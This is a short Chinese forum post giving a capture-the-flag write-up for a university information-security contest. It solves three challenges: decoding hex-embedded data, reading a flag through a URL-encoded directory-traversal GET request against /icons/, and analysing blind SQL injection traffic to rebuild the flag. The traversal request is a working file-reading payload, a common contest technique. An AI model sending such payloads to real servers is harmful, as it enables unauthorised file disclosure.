电科院密码保密与信息安全竞赛网络攻防宣传赛 Writeup ...

打印 上一主题 下一主题

主题 940|帖子 940|积分 2824

一、 战队信息

战队名称:20221214
战队排名:1
二、 解题过程

ctf1

用Winhex打开,末了有一串编码字符,拿去一把梭即可。

ctf2

目录穿越
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/flag

ctf3

仔细观察可以看到url编码后的SQL注入语句,mid用于截取字符串,当出现welcome admin!阐明该字符正确,将正确的字符逐个写入到C脚本变量中,输出得到flag。
[code]char a[] = {102,108,97,103,123,99,49,52,50,54,53,97,53,51,98,101,99,49,56,52,56,98,102,97,99,50,100,102,100,97,51,101,54,54,55,98,99,125};        cout

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

东湖之滨

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表